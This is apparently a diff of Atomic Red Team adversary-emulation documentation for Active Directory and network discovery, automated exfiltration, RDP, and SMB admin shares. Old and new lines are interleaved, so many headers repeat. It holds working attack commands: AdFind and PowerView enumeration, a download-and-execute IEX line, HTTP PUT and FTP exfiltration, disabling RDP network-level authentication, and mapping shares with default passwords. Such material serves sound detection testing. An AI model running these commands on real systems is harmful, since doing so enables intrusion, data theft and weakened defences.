**auto_generated_guid:** `a889f5be-2d54-4050-bd05-884578748bb4`
#### Inputs
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects
<br/>
<br/>
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `5838c31e-a0e2-4b9f-b60a-d79d2cb7995e`
#### Inputs
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #12: Remote System Discovery - ip neighbour
<br/>
<br/>
## Atomic Test #12 - Remote System Discovery - ip neighbour
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
**Supported Platforms:** Linux
**auto_generated_guid:** `158bd4dd-6359-40ab-b13c-285b9ef6fa25`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 158bd4dd-6359-40ab-b13c-285b9ef6fa25
#### Attack Commands: Run with `sh`!
```sh
ip neighbour show
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #13: Remote System Discovery - ip route
<br/>
<br/>
## Atomic Test #13 - Remote System Discovery - ip route
Use the ip route command to display the kernels routing tables.
**Supported Platforms:** Linux
**auto_generated_guid:** `1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
#### Attack Commands: Run with `sh`!
```sh
ip route show
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #14: Remote System Discovery - netstat
<br/>
<br/>
## Atomic Test #14 - Remote System Discovery - netstat
Use the netstat command to display the kernels routing tables.
**Supported Platforms:** Linux
**auto_generated_guid:** `d2791d72-b67f-4615-814f-ec824a91f514`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
#### Attack Commands: Run with `sh`!
```sh
netstat -r | grep default
```
### Atomic Test #15: Remote System Discovery - ip tcp_metrics
<br/>
<br/>
## Atomic Test #15 - Remote System Discovery - ip tcp_metrics
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
**Supported Platforms:** Linux
**auto_generated_guid:** `6c2da894-0b57-43cb-87af-46ea3b501388`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 6c2da894-0b57-43cb-87af-46ea3b501388
#### Attack Commands: Run with `sh`!
```sh
ip tcp_metrics show |grep --invert-match "^127\."
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher
<br/>
<br/>
## Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain.
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement.
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
@@ -474,9 +657,16 @@ Upon successful execution, this test will output the names of the computers that
**Supported Platforms:** Windows
**auto_generated_guid:** `962a6017-1c09-45a6-880b-adc9c57cb22e`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 962a6017-1c09-45a6-880b-adc9c57cb22e
#### Attack Commands: Run with `powershell`!
```powershell
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
@@ -489,143 +679,221 @@ foreach ($Computer in $Computers) {
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: This PC must be joined to a domain.
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
write-host "This PC must be manually added to a domain."
```
### Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer
<br/>
<br/>
## Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
Upon successful execution a listing of Computers will output with their paths in AD.
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
**Supported Platforms:** Windows
**auto_generated_guid:** `97e89d9e-e3f5-41b5-a90f-1e0825df0fdf`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
#### Attack Commands: Run with `powershell`!
```powershell
Get-AdComputer -Filter *
```
### Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher
<br/>
<br/>
## Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
Upon successful execution a listing of computers will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
**Supported Platforms:** Windows
**auto_generated_guid:** `64ede6ac-b57a-41c2-a7d1-32c6cd35397d`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
#### Attack Commands: Run with `powershell`!
```powershell
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
```
### Atomic Test #19: Get-DomainController with PowerView
<br/>
<br/>
## Atomic Test #19 - Get-DomainController with PowerView
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `b9d2e8ca-5520-4737-8076-4f08913da2c4`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
```
### Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers
<br/>
<br/>
## Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
**Supported Platforms:** Windows
**auto_generated_guid:** `e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
#### Attack Commands: Run with `powershell`!
```powershell
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
```
### Atomic Test #21: Remote System Discovery - net group Domain Controller
<br/>
<br/>
## Atomic Test #21 - Remote System Discovery - net group Domain Controller
Identify remote systems with net.exe querying the Active Directory Domain Controller.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `5843529a-5056-4bc1-9c13-a311e2af4ca0`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 5843529a-5056-4bc1-9c13-a311e2af4ca0
#### Attack Commands: Run with `command_prompt`!
```cmd
net group /domain "Domain controllers"
```
### Atomic Test #22: Enumerate Remote Hosts with Netscan
<br/>
<br/>
## Atomic Test #22 - Enumerate Remote Hosts with Netscan
This test uses Netscan to identify remote hosts in a specified network range.
**Supported Platforms:** Windows
**auto_generated_guid:** `b8147c9a-84db-4ec1-8eee-4e0da75f0de5`
#### Inputs
**auto_generated_guid:** b8147c9a-84db-4ec1-8eee-4e0da75f0de5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| netscan_path | NetScan exe location | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;netscan&#92;64-bit&#92;netscan.exe|
| range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Netscan must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
```
<br/>
atomics/T1020/T1020.md
+45 -19
View File
@@ -1,36 +1,45 @@
# T1020 - Automated Exfiltration
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
<blockquote>
## Description from ATT&CK
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
>
> When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
[Source](https://attack.mitre.org/techniques/T1020)
</blockquote>
## Atomic Tests
- [Atomic Test #1: IcedID Botnet HTTP PUT](#atomic-test-1-icedid-botnet-http-put)
- [Atomic Test #2: Exfiltration via Encrypted FTP](#atomic-test-2-exfiltration-via-encrypted-ftp)
- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
### Atomic Test #1: IcedID Botnet HTTP PUT
- [Atomic Test #2 - Exfiltration via Encrypted FTP](#atomic-test-2---exfiltration-via-encrypted-ftp)
<br/>
## Atomic Test #1 - IcedID Botnet HTTP PUT
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file
**Supported Platforms:** Windows
**auto_generated_guid:** `9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0`
#### Inputs
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$fileName = "#{file}"
@@ -40,29 +49,41 @@ $contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
```
### Atomic Test #2: Exfiltration via Encrypted FTP
<br/>
<br/>
## Atomic Test #2 - Exfiltration via Encrypted FTP
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
**Supported Platforms:** Windows
**auto_generated_guid:** `5b380e96-b0ef-4072-8a8e-f194cb9eb9ac`
#### Inputs
**auto_generated_guid:** 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sampleFile | Path of the sample file to exfiltrate. | String | C:&#92;temp&#92;T1020__FTP_sample.txt|
| ftpServer | FTP server URL. | Url | ftp://example.com|
| credentials | FTP server credentials. | String | [user:password]|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$sampleData = "Sample data for exfiltration test"
@@ -72,8 +93,13 @@ $creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
```
<br/>
atomics/T1021.001/T1021.001.md
+89 -42
View File
@@ -1,32 +1,41 @@
# T1021.001 - Remote Services: Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
>
> Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
>
> Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
[Source](https://attack.mitre.org/techniques/T1021/001)
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
</blockquote>
## Atomic Tests
- [Atomic Test #1: RDP to DomainController](#atomic-test-1-rdp-to-domaincontroller)
- [Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2-changing-rdp-port-to-non-standard-port-via-powershell)
- [Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3-changing-rdp-port-to-non-standard-port-via-command_prompt)
- [Atomic Test #4: Disable NLA for RDP via Command Prompt](#atomic-test-4-disable-nla-for-rdp-via-command-prompt)
- [Atomic Test #1 - RDP to DomainController](#atomic-test-1---rdp-to-domaincontroller)
### Atomic Test #1: RDP to DomainController
- [Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2---changing-rdp-port-to-non-standard-port-via-powershell)
- [Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3---changing-rdp-port-to-non-standard-port-via-command_prompt)
- [Atomic Test #4 - Disable NLA for RDP via Command Prompt](#atomic-test-4---disable-nla-for-rdp-via-command-prompt)
<br/>
## Atomic Test #1 - RDP to DomainController
Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
**auto_generated_guid:** `355d4632-8cb9-449d-91ce-b566d0253d3e`
#### Inputs
**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
@@ -34,7 +43,9 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
| username | Username argument default %username% | string | $ENV:USERNAME|
| password | Password | string | 1password2!|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$Server=#{logonserver}
@@ -45,112 +56,148 @@ mstsc /v:$Server
echo "RDP connection established"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually
```
### Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell
<br/>
<br/>
## Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell
Changing RDP Port to Non Standard Port via Powershell
**Supported Platforms:** Windows
**auto_generated_guid:** `2f840dd4-8a2e-4f44-beb3-6b2399ea3771`
#### Inputs
**auto_generated_guid:** 2f840dd4-8a2e-4f44-beb3-6b2399ea3771
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
| NEW_Remote_Port | New RDP Listening Port | string | 4489|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction Ignore
Get-Service TermService | Restart-Service -Force -ErrorAction Ignore
```
### Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt
<br/>
<br/>
## Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt
Changing RDP Port to Non Standard Port via Command_Prompt
**Supported Platforms:** Windows
**auto_generated_guid:** `74ace21e-a31c-4f7d-b540-53e4eb6d1f73`
#### Inputs
**auto_generated_guid:** 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
| NEW_Remote_Port | New RDP Listening Port | string | 4489|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
net stop TermService /y >nul 2>&1
net start TermService >nul 2>&1
```
### Atomic Test #4: Disable NLA for RDP via Command Prompt
<br/>
<br/>
## Atomic Test #4 - Disable NLA for RDP via Command Prompt
Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt
Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
**Supported Platforms:** Windows
**auto_generated_guid:** `01d1c6c0-faf0-408e-b368-752a02285cb2`
#### Inputs
**auto_generated_guid:** 01d1c6c0-faf0-408e-b368-752a02285cb2
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Default_UserAuthentication | Default UserAuthentication registry value | string | 1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1
```
<br/>
atomics/T1021.002/T1021.002.md
+85 -34
View File
@@ -1,32 +1,41 @@
# T1021.002 - Remote Services: SMB/Windows Admin Shares
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
>
> SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
>
> Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
[Source](https://attack.mitre.org/techniques/T1021/002)
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Map admin share](#atomic-test-1-map-admin-share)
- [Atomic Test #2: Map Admin Share PowerShell](#atomic-test-2-map-admin-share-powershell)
- [Atomic Test #3: Copy and Execute File with PsExec](#atomic-test-3-copy-and-execute-file-with-psexec)
- [Atomic Test #4: Execute command writing output to local Admin Share](#atomic-test-4-execute-command-writing-output-to-local-admin-share)
- [Atomic Test #1 - Map admin share](#atomic-test-1---map-admin-share)
### Atomic Test #1: Map admin share
- [Atomic Test #2 - Map Admin Share PowerShell](#atomic-test-2---map-admin-share-powershell)
- [Atomic Test #3 - Copy and Execute File with PsExec](#atomic-test-3---copy-and-execute-file-with-psexec)
- [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share)
<br/>
## Atomic Test #1 - Map admin share
Connecting To Remote Shares
**Supported Platforms:** Windows
**auto_generated_guid:** `3386975b-367a-4fbb-9d77-4dcf3639ffd3`
#### Inputs
**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | DOMAIN&#92;Administrator|
@@ -34,69 +43,94 @@ Connecting To Remote Shares
| password | Password | string | P@ssw0rd1|
| computer_name | Target Computer Name | string | Target|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
### Atomic Test #2: Map Admin Share PowerShell
<br/>
<br/>
## Atomic Test #2 - Map Admin Share PowerShell
Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** `514e9cd7-9207-4882-98b1-c8f791bae3c5`
#### Inputs
**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | string | C$|
| map_name | Mapped Drive Letter | string | g|
| computer_name | Target Computer Name | string | Target|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
### Atomic Test #3: Copy and Execute File with PsExec
<br/>
<br/>
## Atomic Test #3 - Copy and Execute File with PsExec
